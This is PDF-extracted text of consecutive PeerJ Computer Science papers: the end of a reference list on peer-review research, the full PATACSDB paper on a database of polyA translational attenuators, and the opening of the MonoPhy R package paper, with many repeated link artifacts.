ArXiv preprint. arXiv:1907.04103. Jamieson KH, McNutt M, Kiermer V, Sever R. 2019. Signaling the trustworthiness of science. Proceedings of the National Academy of Sciences of the United States of America 116(39):19231–19236 DOI 10.1073/pnas.1913039116. Jerger NE, Kaeli D, Kozyrakis C, Loh G, Wenisch T, Wood D. 2017. Report from the Committee to Study the ISCA Review Process (R2). Available at https://docs.google. com/presentation/d/1jzgB4QBpiHoyQS0qm5bh4T8ROub412RsGI871_JKCKU/. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 21/23 https://peerj.com https://www.microarch.org/docs/diversity-survey-2018.pdf https://campaign.editage.com/global_survey_report_2018/ https://www.elsevier.com/research-intelligence/campaigns/gender-17 https://www.elsevier.com/research-intelligence/campaigns/gender-17 http://dx.doi.org/10.1111/j.1467-971X.2010.01656.x http://dx.doi.org/10.1016/S1060-3743(99)80125-8 http://dx.doi.org/10.2307/3587862 http://arXiv.org/abs/1507.06411 http://dx.doi.org/10.1073/pnas.0507655102 http://arXiv.org/abs/1907.04103 http://dx.doi.org/10.1073/pnas.1913039116 https://docs.google.com/presentation/d/1jzgB4QBpiHoyQS0qm5bh4T8ROub412RsGI871_JKCKU/ https://docs.google.com/presentation/d/1jzgB4QBpiHoyQS0qm5bh4T8ROub412RsGI871_JKCKU/ http://dx.doi.org/10.7717/peerj-cs.299 Karimi F, Wagner C, Lemmerich F, Jadidi M, Strohmaier M. 2016. Inferring gender from names on the web: a comparative evaluation of gender detection methods. In: Proceedings of the 25th international conference companion on world wide web, WWW’16 companion, international world wide web conferences steering committee. Republic and Canton of Geneva, Switzerland, 53–54 DOI 10.1145/2872518.2889385. Langford J. 2012. ICML acceptance statistics. Available at http://hunch.net/?p=2517. Langford J. 2013. Representative reviewing. Communications of the ACM. Available at https://cacm.acm.org/blogs/blog-cacm/165288-representative-reviewing/fulltext. Lawrence N, Cortes C. 2014. The NIPS experiment. Available at http://inverseprobability. com/2014/12/16/the-nips-experiment. Lee CJ, Sugimoto CR, Zhang G, Cronin B. 2013. Bias in peer review. Journal of the American Society for Information Science and Technology 64(1):2–17 DOI 10.1002/asi.22784. Mahoney MJ. 1977. Publication prejudices: an experimental study of confirmatory bias in the peer review system. Cognitive Therapy and Research 1(2):161–175 DOI 10.1007/BF01173636. Mainguy G, Motamedi MR, Mietchen D. 2005. Peer review–the newcomers’ perspective. PLOS Biology 3(9):e326 DOI 10.1371/journal.pbio.0030326. Mattauch S, Lohmann K, Hannig F, Lohmann D, Teich J. 2020. A bibliometric approach for detecting the gender gap in computer science. Communications of the ACM 63:74–80 DOI 10.1145/3376901. McNutt RA, Evans AT, Fletcher RH, Fletcher SW. 1990. The effects of blinding on the quality of peer review: a randomized trial. JAMA 263(10):1371–1376 DOI 10.1001/jama.1990.03440100079012. Murray D, Siler K, Lariviére V, Chan WM, Collings AM, Raymond J, Sugimoto CR. 2019. Gender and international diversity improves equity in peer review. BioRxiv 400515. Papagiannaki K. 2007. Author feedback experiment at PAM 2007. ACM SIGCOMM Computer Communication Review 37(3):73–78. Parno B, Erlingsson U, Enck W. 2017. Report on the IEEE S&P 2017 submission and review process and its experiments. Available at http://www.ieee-security.org/TC/ Reports/2017/SP2017-PCChairReport.pdf. Rozycki W, Johnson NH. 2013. Non-canonical grammar in Best Paper award winners in engineering. English for Specific Purposes 32(3):157–169 DOI 10.1016/j.esp.2013.04.002. Sense about Science. 2019. Quality, trust & peer review: researchers’ perspectives 10 years on. Available at https://senseaboutscience.org/wp-content/uploads/2019/09/Quality- trust-peer-review.pdf. Shah NB, Tabibian B, Muandet K, Guyon I, Von Luxburg U. 2018. Design and anal- ysis of the NIPS 2016 review process. The Journal of Machine Learning Research 19(1):1913–1946. Solomon DJ. 2014. A survey of authors publishing in four megajournals. PeerJ 2:e365 DOI 10.7717/peerj.365. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 22/23 https://peerj.com http://dx.doi.org/10.1145/2872518.2889385 http://hunch.net/?p=2517 https://cacm.acm.org/blogs/blog-cacm/165288-representative-reviewing/fulltext http://inverseprobability.com/2014/12/16/the-nips-experiment http://inverseprobability.com/2014/12/16/the-nips-experiment http://dx.doi.org/10.1002/asi.22784 http://dx.doi.org/10.1007/BF01173636 http://dx.doi.org/10.1371/journal.pbio.0030326 http://dx.doi.org/10.1145/3376901 http://dx.doi.org/10.1001/jama.1990.03440100079012 http://www.ieee-security.org/TC/Reports/2017/SP2017-PCChairReport.pdf http://www.ieee-security.org/TC/Reports/2017/SP2017-PCChairReport.pdf http://dx.doi.org/10.1016/j.esp.2013.04.002 https://senseaboutscience.org/wp-content/uploads/2019/09/Quality-trust-peer-review.pdf https://senseaboutscience.org/wp-content/uploads/2019/09/Quality-trust-peer-review.pdf http://dx.doi.org/10.7717/peerj.365 http://dx.doi.org/10.7717/peerj-cs.299 Tomkins A, Zhang M, Heavlin WD. 2017. Reviewer bias in single-versus double-blind peer review. Proceedings of the National Academy of Sciences of the United States of America 114(48):12708–12713 DOI 10.1073/pnas.1707323114. Vardi MY. 2009. Conferences vs. journals in computing research. Communications of the ACM 52(5):5–5. Vines T. 2011. Is peer review a coin toss? The Scholarly Kitchen. Available at https:// scholarlykitchen.sspnet.org/2011/12/08/is-peer-review-a-coin-toss/. Wallach DS. 2011. Rebooting the CS publication process. Communications of the ACM 54(10):32–35. Wang LL, Stanovsky G, Weihs L, Etzioni O. 2019. Gender trends in computer science authorship. ArXiv preprint. arXiv:1906.07883. Frachtenberg and Koster (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.299 23/23 https://peerj.com http://dx.doi.org/10.1073/pnas.1707323114 https://scholarlykitchen.sspnet.org/2011/12/08/is-peer-review-a-coin-toss/ https://scholarlykitchen.sspnet.org/2011/12/08/is-peer-review-a-coin-toss/ http://arXiv.org/abs/1906.07883 http://dx.doi.org/10.7717/peerj-cs.299 work_kv3srcrerrazfgb2arzc4pde5q ---- PATACSDB---the database of polyA translational attenuators in coding sequences Submitted 2 December 2015 Accepted 17 January 2016 Published 3 February 2016 Corresponding author Pawel Szczesny, szczesny@ibb.waw.pl Academic editor Tak-Wah Lam Additional Information and Declarations can be found on page 5 DOI 10.7717/peerj-cs.45 Copyright 2016 Habich et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS PATACSDB—the database of polyA translational attenuators in coding sequences Malgorzata Habich1, Sergej Djuranovic2 and Pawel Szczesny1 ,3 1 Institute of Biochemistry and Biophysics Polish Academy of Sciences, Department of Bioinformatics, Warsaw, Poland 2 Department of Cell Biology and Physiology, Washington University School of Medicine, Saint Louis, MO, United States of America 3 Faculty of Biology, Institute of Experimental Plant Biology and Biotechnology, University of Warsaw, Warsaw, Poland ABSTRACT Recent additions to the repertoire of gene expression regulatory mechanisms are polyadenylate (polyA) tracks encoding for poly-lysine runs in protein sequences. Such tracks stall the translation apparatus and induce frameshifting independently of the effects of charged nascent poly-lysine sequence on the ribosome exit channel. As such, they substantially influence the stability of mRNA and the amount of protein produced from a given transcript. Single base changes in these regions are enough to exert a measurable response on both protein and mRNA abundance; this makes each of these sequences a potentially interesting case study for the effects of synonymous mutation, gene dosage balance and natural frameshifting. Here we present PATACSDB, a resource that contain a comprehensive list of polyA tracks from over 250 eukaryotic genomes. Our data is based on the Ensembl genomic database of coding sequences and filtered with algorithm of 12A-1 which selects sequences of polyA tracks with a minimal length of 12 A’s allowing for one mismatched base. The PATACSDB database is accessible at: http://sysbio.ibb.waw.pl/patacsdb. The source code is available at http://github.com/habich/PATACSDB, and it includes the scripts with which the database can be recreated. Subjects Bioinformatics, Databases Keywords Ribosome stalling, Gene regulation, Eukaryotic genomes, mRNA stability, Translation BACKGROUND The classical view of the genetic information flow inside living cells—the transcription from DNA to RNA and finally translation of mRNA into protein—is a subject of continous modification for both direction of the flow and the number of players involved. After decades of research we keep accumulating evidences of several control points at different levels of these processes. The past studies were focused on transcriptional regulation, but more recently the regulation of gene expression at the level of translation drew researchers’ attention. Translational regulation generally controls the amount of protein synthesised from a given mRNA through several mechanisms, targeting recruitment of ribosomes to How to cite this article Habich et al. (2016), PATACSDB—the database of polyA translational attenuators in coding sequences. PeerJ Comput. Sci. 2:e45; DOI 10.7717/peerj-cs.45 mailto:szczesny@ibb.waw.pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.45 http://dx.doi.org/10.7717/peerj-cs.45 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://github.com/habich/PATACSDB http://dx.doi.org/10.7717/peerj-cs.45 the transcript, elongation speed, termination and as a proxy to all these processes mRNA stability. Ribosome stalling—the pausing of ribosome during translational cycle—is recognized by components of several mRNA surveillance pathways. As a result of the im- peded rate of ribosome along the mRNA, the transcript is endonucleolytically cleaved and nascent albeit incomplete protein product is degraded by proteasome (Shoemaker & Green, 2012). Over the years, we have got to know that certain sequence features can trigger ribo- some stalling. These are damaged bases (Cruz-Vera et al., 2004), stable stem-loop structures (Doma & Parker, 2006), rare codons (Letzring, Dean & Grayhack, 2010), mRNAs lacking stop codons (so called non-stop mRNAs) (Dimitrova et al., 2009), runs of codons that encode consecutive basic aminoacids (Kuroha et al., 2010; Brandman et al., 2012), or finally, runs of adenines encoding poly-lysine tracks (Koutmou et al., 2015; Arthur et al., 2015). We have recently shown that polyA tracks trigger a response in a different manner than runs of basic aminoacids (Arthur et al., 2015). In addition to stalling, they occasionally lead to ribosome sliding on mRNA transcript which results in production of additional frameshifted product next to the known and well annotated gene protein product. As such polyA track sequences may support programed translational frameshifts in such mRNA transcripts giving rise to alternative protein products from those genes. This feature of polyA track genes resembles programmed frameshifting observed in viral genes with slippery sequences however without a need for additional mRNA structures that induces ribosome stalling in known viral transcripts (Chen et al., 2014; Yan et al., 2015). The ultimate control over the production and stability of alternative transcripts from polyA track genes in Eukaryotes would be based on mRNA surveillance mechanisms, mainly non-sense mediated mRNA decay (NMD) or if the kinetic stall persists by no-go mRNA decay (NGD). PolyA tracks are highly conserved in genes among Eukaryotes and it is likely that they represent a universal translational attenuators or programed translational frameshift signals. Intrinsically this novel RNA motif plays an important role in balancing gene dosage and homeostasis of cellular environment. The level of attenuation, frameshifting and exact role of polyA tracks in organisms homeostasis is still to be elucidated. PATACSDB server While there are several resources devoted to polyadenylation signals in genomic sequences, these have different sequence signature and refer to the processing of mRNA, not translation. No genomic database reports polyA tracks in coding sequences, therefore we have designed PATACSDB (PolyA Translational Attenuators in Coding Sequences DataBase), a resource devoted to collection of such features among eukaryotic organisms. In concordance with our experimental data from the controlled expression of reporter sequences or natural gene expression profiles we have designed a 12A-1 pattern, that is pattern of twelve adenines in coding region allowing for one mismatch. Based on our experiments, this is a minimal pattern that should result in reduction of expression by roughly 30%, a magnitude that can potentially have a measurable biological impact in human cells (Arthur et al., 2015). We have extrapolated this pattern to other organisms, Habich et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.45 2/7 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.45 Table 1 Summary of the content of PATACSDB. Feature Value Total number of polyA-carrying transcripts 197,964 Highest percentage of polyA-carrying transcripts (first 5) Plasmodium berghei 68.259% Plasmodium yoelii 17× 64.957% Plasmodium falciparum 63.539% Plasmodium chabaudi 63.372% Plasmodium reichenowi 62.933% Lowest percentage of polyA-carrying transcripts (first 5) Pythium vexans 0.025% Saprolegnia diclina vs. 20 0.038% Leishmania major 0.048% Phytophthora sojae 0.058% Salpingoeca rosetta 0.060% Median and average percentage of polyA-carrying transcripts 2.0% and 7.6% respectively The longest polyA tracks (first 10) 132 nt—CDO62875 (Plasmodium reichenowi) 131 nt—CDO63348 (Plasmodium reichenowi) 111 nt—ETW31025 (Plasmodium falciparum fch 4) 109 nt—ETW57402 (Plasmodium falciparum palo alto uganda) 107 nt—ETW41820 (Plasmodium falciparum nf135 5 c10) 107 nt—ETW15539 (Plasmodium falciparum vietnam oak knoll fvo) 97 nt—CDO66404 (Plasmodium reichenowi) 95 nt—EUT78604 (Plasmodium falciparum santa lucia) 89 nt—ETW44841 (Plasmodium falciparum nf135 5 c10) 88 nt—ETW48723 (Plasmodium falciparum malips096 e11) because without further experimental work we have no way to define the minimal polyA pattern in other organisms. We have analyzed eukaryotic Ensembl genomes (Flicek et al., 2014) for the presence of this pattern in coding sequences, using only these entries for which coding sequence matched reported translated sequence. This was done not only on standard Ensembl genomes but additional eukaryotic databases like Ensembl Protists and Ensembl Metazoa. As a result, we have identified 197,964 genes in 254 genomes that carry 446,206 polyA tracks. PolyA tracks across eukaryotic organisms In the previous studies (Koutmou et al., 2015; Arthur et al., 2015) we focused mainly on polyA tracks from human and yeast genomes, using the NCBI (Pruitt et al., 2014) database and SGD (Cherry et al., 1998) as data sources, respectively. Overall there is a good agreement between our previous analysis and this study for high eukaryotes, while we see some discrepancies for lower eukaryotes such as yeast. For example, in the previous study we have underestimated the number of polyA-carrying genes in yeast by an order of magnitude (29 vs. 369)—a result of different data source. The percentage of polyA carrying transcripts varies from organism to organism and exceeds 60% for Plasmodium species, well known for their AT-rich genome (see Table 1 for summary). However, the distribution of lengths of polyA tracks is quite similar across Habich et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.45 3/7 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.45 Figure 1 Distribution of polyA lengths vs. AT-ratio of analyzed genomes. Data for lengths of polyA were divided into 16 bins distributed evenly across spectrum of AT-richness of analyzed genomes. The width of a box is proportional to the number of observances in a particular bin. Lines denote 1.5∗IQR (interquantile range). Outliers were removed for clarity. Data start at length of 12, as this was the length of the minimal pattern used. whole observed spectrum of AT-content (Fig. 1). It might be that the single Plasmodium genus is skewing the distribution, as the species distribution of genomic databases is heavily biased. In humans, only around 1% of transcripts coming from ca. 2% of genes carry polyA track and, as such, are subjects of translational attenuation. This is close to a median across all analyzed genomes. Furthermore, we did not find any correlation between organismal complexity and number of polyA-affected genes. This might indicate that such a feature is a constituent element of translational machinery, unrelated to external factors and regulatory mechanisms. Software architecture The main table consists of protein common name, gene and transcripts Ensembl ids, location of the polyA track expressed as percentage (allows for quick identification of cases where polyA track is either at the end or at the beginning of the protein) and, finally, the identified polyA track with a context of surrounding sequence. All columns are sortable. By default, the table is alphabetically sorted by protein name. Sorting gene and transcript IDs is also alphabetical. Location is sorted numerically. The rows with polyA sequences is sortable by polyA track length, so the user can quickly identify sequences with the longest track in particular organism. Obviously, due to the used pattern, the shortest polyA tracks Habich et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.45 4/7 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.45 have length of 12 nucleotides. To facilitate quick interaction with tables, we have used Bootstrap-table library that allows for easy and intuitive sorting and searching through all fields in particular genome. The project was created using Python 2.7. To parse biological data, we used Biopython 1.65. To compare protein and cdna sequences, we used local version of NCBI blast+ software v. 2.2.31. To run the web service, we used Flask v.0.10.1. We used SQLite3 database engine and SQLAlchemy for database access. To query the Ensembl database, we used mysql client. We also used two other Python libraries: xmltodict and requests. The most difficult task was to ensure short pageload times given the large dataset on which we worked. To solve this problem, we have created additional tables in database which contain metadata with the heaviest queries. This solution decreased time of loading more than 20 times. We have designed a two-step architecture. In the first step, we analyse data from the Ensembl database and create our database with 12A-1 pattern. In the second step, we use created database to provide information to the web service. This architecture allows one to separate obtaining data and running the web service, thus, during analysis of new version of Ensembl data we still can provide data about old version, and changes between versions can be effected in seconds without the notice of the user. In the future, we will work on parallelization process of Ensembl data analysis to speed up the first step. It is likely that polyA segments are not the only sequence determinants of translation efficiency in coding sequences, and further studies will discover more of such motifs or different lengths of minimal polyA pattern for a particular organism. The design of the PATACSDB engine allows for easy modification towards finding and cataloguing of novel sequence patterns. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Malgorzata Habich conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • Sergej Djuranovic conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. • Pawel Szczesny conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. Habich et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.45 5/7 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.45 Data Availability The following information was supplied regarding data availability: https://github.com/habich/PATACSDB/. REFERENCES Arthur L, Pavlovic-Djuranovic S, Smith-Koutmou K, Green R, Szczesny P, Djuranovic S. 2015. Translational control by lysine-encoding A-rich sequences. Science Advances 1(6):e1500154 DOI 10.1126/sciadv.1500154. Brandman O, Stewart-Ornstein J, Wong D, Larson A, Williams CC, Li G-W, Zhou S, King D, Shen PS, Weibezahn J, Dunn JG, Rouskin S, Inada T, Frost A, Weissman JS. 2012. A ribosome-bound quality control complex triggers degradation of nascent peptides and signals translation stress. Cell 151:1042–1054 DOI 10.1016/j.cell.2012.10.044. Chen J, Petrov A, Johansson M, Tsai A, O’Leary SE, Puglisi J. 2014. Dynamic pathways of −1 translational frameshifting. Nature 512:328–332 DOI 10.1038/nature13428. Cherry JM, Adler C, Ball C, Chervitz SA, Dwight SS, Hester ET, Jia Y, Juvik G, Roe T, Schroeder M, Weng S, Botstein D. 1998. SGD: Saccharomyces genome database. Nucleic Acids Research 26:73–79 DOI 10.1093/nar/26.1.73. Cruz-Vera LR, Magos-Castro MA, Zamora-Romo E, Guarneros G. 2004. Ribosome stalling and peptidyl-tRNA drop-off during translational delay at AGA codons. Nucleic Acids Research 32:4462–4468 DOI 10.1093/nar/gkh784. Dimitrova LN, Kuroha K, Tatematsu T, Inada T. 2009. Nascent peptide-dependent translation arrest leads to Not4p-mediated protein degradation by the proteasome. The Journal of Biological Chemistry 284:10343–10352 DOI 10.1074/jbc.M808840200. Doma MK, Parker R. 2006. Endonucleolytic cleavage of eukaryotic mRNAs with stalls in translation elongation. Nature 440:561–564 DOI 10.1038/nature04530. Flicek P, Amode MR, Barrell D, Beal K, Billis K, Brent S, Carvalho-Silva D, Clapham P, Coates G, Fitzgerald S, Gil L, Girón CG, Gordon L, Hourlier T, Hunt S, Johnson N, Juettemann T, Kähäri AK, Keenan S, Kulesha E, Martin FJ, Maurel T, McLaren WM, Murphy DN, Nag R, Overduin B, Pignatelli M, Pritchard B, Pritchard E, Riat HS, Ruffier M, Sheppard D, Taylor K, Thormann A, Trevanion SJ, Vullo A, Wilder SP, Wilson M, Zadissa A, Aken BL, Birney E, Cunningham F, Harrow J, Herrero J, Hubbard TJP, Kinsella R, Muffato M, Parker A, Spudich G, Yates A, Zerbino DR, Searle SMJ. 2014. Ensembl. Nucleic Acids Research 42:D749–D755 DOI 10.1093/nar/gkt1196. Koutmou KS, Schuller AP, Brunelle JL, Radhakrishnan A, Djuranovic S, Green R. 2015. Ribosomes slide on lysine-encoding homopolymeric A stretches. eLife 4:e05534 DOI 10.7554/eLife.05534. Kuroha K, Akamatsu M, Dimitrova L, Ito T, Kato Y, Shirahige K, Inada T. 2010. Receptor for activated C kinase 1 stimulates nascent polypeptide-dependent translation arrest. EMBO Reports 11:956–961 DOI 10.1038/embor.2010.169. Letzring DP, Dean KM, Grayhack EJ. 2010. Control of translation efficiency in yeast by codon-anticodon interactions. RNA 16:2516–2528 DOI 10.1261/rna.2411710. Pruitt KD, Brown GR, Hiatt SM, Thibaud-Nissen F, Astashyn A, Ermolaeva O, Farrell CM, Hart J, Landrum MJ, McGarvey KM, Murphy MR, O’Leary NA, Pujar S, Rajput B, Rangwala SH, Riddick LD, Shkeda A, Sun H, Tamez P, Tully RE, Wallin C, Webb D, Habich et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.45 6/7 https://peerj.com/computer-science/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ https://github.com/habich/PATACSDB/ http://dx.doi.org/10.1126/sciadv.1500154 http://dx.doi.org/10.1016/j.cell.2012.10.044 http://dx.doi.org/10.1038/nature13428 http://dx.doi.org/10.1093/nar/26.1.73 http://dx.doi.org/10.1093/nar/gkh784 http://dx.doi.org/10.1074/jbc.M808840200 http://dx.doi.org/10.1038/nature04530 http://dx.doi.org/10.1093/nar/gkt1196 http://dx.doi.org/10.7554/eLife.05534 http://dx.doi.org/10.1038/embor.2010.169 http://dx.doi.org/10.1261/rna.2411710 http://dx.doi.org/10.7717/peerj-cs.45 Weber J, Wu W, DiCuccio M, Kitts P, Maglott DR, Murphy TD, Ostell JM. 2014. RefSeq: an update on mammalian reference sequences. Nucleic Acids Research 42:D756–D763 DOI 10.1093/nar/gkt1114. Shoemaker CJ, Green R. 2012. Translation drives mRNA quality control. Nature Structural & Molecular Biology 19:594–601 DOI 10.1038/nsmb.2301. Yan S, Wen J-D, Bustamante C, Tinoco Jr I. 2015. Ribosome excursions during mRNA translocation mediate broad branching of frameshift pathways. Cell 160:870–881 DOI 10.1016/j.cell.2015.02.003. Habich et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.45 7/7 https://peerj.com/computer-science/ http://dx.doi.org/10.1093/nar/gkt1114 http://dx.doi.org/10.1038/nsmb.2301 http://dx.doi.org/10.1016/j.cell.2015.02.003 http://dx.doi.org/10.7717/peerj-cs.45 PATACSDB---the database of polyA translational attenuators in coding sequences Background PATACSDB server PolyA tracks across eukaryotic organisms Software architecture References work_kwuwhxyuhrdghduymgc3bhsk6q ---- Submitted 18 December 2015 Accepted 15 March 2016 Published 30 March 2016 Corresponding author Orlando Schwery, oschwery@vols.utk.edu Academic editor Mihai Pop Additional Information and Declarations can be found on page 5 DOI 10.7717/peerj-cs.56 Copyright 2016 Schwery and O’Meara Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS MonoPhy: a simple R package to find and visualize monophyly issues Orlando Schwery and Brian C. O’Meara Department of Ecology and Evolutionary Biology, University of Tennessee, Knoxville, TN, USA ABSTRACT Background. The monophyly of taxa is an important attribute of a phylogenetic tree. A lack of it may hint at shortcomings of either the tree or the current taxonomy, or can indicate cases of incomplete lineage sorting or horizontal gene transfer. Whichever is the reason, a lack of monophyly can misguide subsequent analyses. While monophyly is conceptually simple, it is manually tedious and time consuming to assess on modern phylogenies of hundreds to thousands of species. Results. The R package MonoPhy allows assessment and exploration of monophyly of taxa in a phylogeny. It can assess the monophyly of genera using the phylogeny only, and with an additional input file any other desired higher order taxa or unranked groups can be checked as well. Conclusion. Summary tables, easily subsettable results and several visualization options allow quick and convenient exploration of monophyly issues, thus making MonoPhy a valuable tool for any researcher working with phylogenies. Subjects Bioinformatics, Computational Biology Keywords Phylogeny, Evolution, Monophyly, R package, Taxonomy, Rogue taxa, Tree conflict, Horizontal gene transfer, Incomplete lineage sorting INTRODUCTION Phylogenetic trees are undoubtedly crucial for most research in ecology or evolutionary biology. Whether one is studying trait evolution (e.g., Coddington, 1988; Donoghue, 1989), diversification (e.g., Gilinsky & Good, 1991; Hey, 1992), phylogeography (Avise et al., 1987), or simply relatedness within a group (e.g., Czelusniak et al., 1982; Shochat & Dessauer, 1981; Sibley & Ahlquist, 1981), bifurcating trees representing hierarchically nested relationships are central to the analysis. Exactly because phylogenies are so fundamental to the inferences we make, we need tools that enable us to examine how reconstructed relationships compare with existing assumptions, particularly taxonomy. We have computational approaches to estimate confidence for parts of a phylogeny (Felsenstein, 1985; Larget & Simon, 1999) or measuring distance between two phylogenies (Robinson, 1971), but assessing agreement of a new phylogeny with existing taxonomy is often done manually. This does not scale to modern phylogenies of hundreds to thousands of taxa. Modern taxonomy seeks to name clades: an ancestor and all of its descendants (the descendants thus form a monophyletic group). Discrepancies between the new phylogenetic hypothesis and the current taxonomic classification may indicate that the phylogeny is wrong or poorly resolved. Alternatively, a well-supported phylogeny that conflicts with currently recognized groups might suggest that the taxonomy should be reformed. To identify such discrepancies, one can simply How to cite this article Schwery and O’Meara (2016), MonoPhy: a simple R package to find and visualize monophyly issues. PeerJ Com- put. Sci. 2:e56; DOI 10.7717/peerj-cs.56 https://peerj.com mailto:oschwery@vols.utk.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.56 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.56 assess whether the established taxa are monophyletic. A lack of group monophyly however, can also be an indicator for conflict between gene trees and the species tree, which may be a result of incomplete lineage sorting or horizontal gene transfer. In any case, monophyly issues in a phylogeny suggest a potential error that can affect downstream analysis and inference. For example, it will mislead ancestral trait or area reconstruction or introduce false signals when assigning unsampled diversity for diversification analyses (e.g., in diversitree (FitzJohn, 2012) or BAMM (Rabosky, 2014)). In general, a lack of monophyly can blur patterns we might see in the data otherwise. As this problem is by no means new, approaches to solve it have been developed earlier, particularly for large scale sequencing projects in bacteria and archaea, for which taxonomic issues are notoriously challenging. The program GRUNT (Dalevi et al., 2007) uses a tip to root walk approach to group, regroup, and name clades according to certain user defined criteria. The subsequently developed ‘taxonomy to tree’ approach (McDonald et al., 2012) matches existing taxonomic levels onto newly generated trees, allowing classification of unidentified sequences and proposal of changes to the taxonomic nomenclature based on tree topology. Finally, Matsen & Gallagher (2012) have developed algorithms that find mismatches between taxonomy and phylogeny using a convex subcoloring approach. The new tool presented here, the R package MonoPhy, is a quick and user-friendly method for assessing monophyly of taxa in a given phylogeny. While the R package ape (Paradis, Claude & Strimmer, 2004) already contains the helpful function is.monophyletic, which also enables testing for monophyly, the functionality of MonoPhy is much broader. Apart from assessing monophyly for all groups and focal taxonomic levels in a tree at once, MonoPhy is also not limited to providing a simple ‘yes-or-no’ output, but rather enables the user to explore underlying causes of non-monophyly. In the following, we outline the structure and usage of the package and provide examples to demonstrate its functionality. For a more usage-focused and application-oriented treatment, one should refer to the tutorial vignette (vignette (‘‘MonoPhyVignette’’)), which contains stepwise instructions for the different functions and their options. For any other package details, consult the documentation (help(‘‘MonoPhy’’)). DESCRIPTION The package MonoPhy is written in R (R Development Core Team, 2014, http://www.R- project.org/), an increasingly important language for evolutionary biology. It builds on the existing packages ape 